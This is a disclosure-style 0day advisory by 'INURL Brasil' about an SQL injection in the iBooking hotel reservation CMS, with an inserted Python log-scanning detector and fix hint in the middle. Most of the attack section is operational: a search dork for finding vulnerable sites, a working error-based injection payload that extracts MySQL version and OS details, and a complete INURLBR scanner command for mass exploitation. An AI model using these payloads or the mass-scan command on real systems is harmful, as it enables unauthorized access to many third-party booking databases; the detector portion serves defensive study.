(0day) IBOOKING CMS - SQL INJECTION
From: INURL Brasil <inurlbr () gmail com>
*# VENDOR:* www.ibooking.com.br
*# Vulnerable versions:* ALL
*# File:* filtro_faixa_etaria.php
*# Parameter:* idPousada (GET)
*# DORK:* intext:"Desenvolvido por ibooking"
---------------------------------------------------------------------------------
*# Description*
The vulnerable request is issued by a JavaScript function found within
/motor-de-reservas
# JavaScript code responsible for the vulnerable request
$.ajax({
    type: "GET",
    url: "filtro_faixa_etaria.php",
    data: "qtde_quartos=1&idPousada=61",
    success: function(xml){
        // response markup is inserted into the page as-is
        $("#filtro_faixa_etaria").html(xml);
    }
});
*# URL Vulnerable:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61
*# POC:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(SQL_INJECTION)
*# Example:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)
*# Return print:*
http://1.bp.blogspot.com/-vttfzGtov5g/VfiRJhIDwVI/AAAAAAAABVY/tPbBSiHft7c/s1600/Captura%2Bde%2Btela%2Bde%2B2015-09-15%2B18%253A42%253A51.png
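For defenders, the advisory gives enough to build a simple detector: filtro_faixa_etaria.php only ever receives qtde_quartos and idPousada as GET parameters, and both should be plain integers, so any other value in those parameters is worth alerting on. The following is an added example (not code from the advisory, INURL Brasil or iBooking) that applies that check to combined-format access log lines; the log lines and IP addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters named in the advisory for filtro_faixa_etaria.php; legitimate
# values are a property id and a room count, i.e. short runs of digits.
INT_PARAMS = {"idPousada", "qtde_quartos"}
INT_RE = re.compile(r"^\d{1,10}$")

# Combined log format (Apache/nginx); only the request target is needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+"'
)


def suspicious_params(request_target: str) -> dict:
    """Return {param: decoded_value} for expected integer parameters of
    filtro_faixa_etaria.php whose value is not a plain integer.
    An empty dict means nothing looked out of place."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/filtro_faixa_etaria.php"):
        return {}
    # parse_qs percent-decodes and turns '+' into a space once.
    qs = parse_qs(parts.query, keep_blank_values=True)
    flagged = {}
    for name in INT_PARAMS:
        for value in qs.get(name, []):
            if not INT_RE.match(value):
                flagged[name] = value
    return flagged


def scan_access_log(lines):
    """Yield (client_ip, timestamp, flagged_params) for each suspicious hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable request line
        flagged = suspicious_params(m.group("target"))
        if flagged:
            hits.append((m.group("ip"), m.group("ts"), flagged))
    return hits


# Constructed sample log lines (not taken from the advisory's screenshot).
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Sep/2015:18:42:51 -0300] "GET /motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61 HTTP/1.1" 200 812',
    '203.0.113.9 - - [15/Sep/2015:18:43:02 -0300] "GET /motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+1%3D1 HTTP/1.1" 200 812',
    '203.0.113.9 - - [15/Sep/2015:18:43:10 -0300] "GET /motor-de-reservas/index.php?page=1 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, ts, flagged in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {ts} {flagged}")
```

The same integer check, applied server-side (cast to int and bind as a query parameter) before the value reaches the SQL statement, is the fix the advisory implies.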
*# Mass exploitation using the INURLBR scanner*
# Download: https://github.com/googleinurl/SCANNER-INURLBR
*# COMMAND*
*# SETTING SEARCH DORK:*
--dork 'YOU_DORK'
*# USE* --dork 'intext:"Desenvolvido por ibooking"'
*# SETTING OUTPUT FILE:*
*# USE* -s 'ibooking.txt'
*# SETTING STRING EXPLOIT GET:*
--exploit-get 'EXPLOIT_GET'
*# USE* --exploit-get
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'
*# SETTING TYPE OF VALIDATION:*
*# USE* -t 3
The third type combines the first and second types; it also establishes a
connection with the exploit through the GET method.
The string set in the parameter --exploit-get is injected directly into the
URL:
Example: --exploit-get '/index.php?id=1&file=conect.php'
URL injection: http://www.target.br/index.php?id=1&file=conect.php
*# SETTING STRING OF VALIDATION:*
Specify the string to be used for validation:
Example: -a {string}
Using: -a '<title>hello world</title>'
If the specified value is found in the target's response, it is considered vulnerable.
- USE: -a 'INURLBR_VULN'
The INURLBR_VULN value is passed in hexadecimal format in the exploit-get
string (0x203a3a494e55524c42525f56554c4e3a3a20 decodes to " ::INURLBR_VULN:: ").
*# COMMAND FULL:*
php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s
'ibooking.txt' --exploit-get
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'
-t 3 -a 'INURLBR_VULN'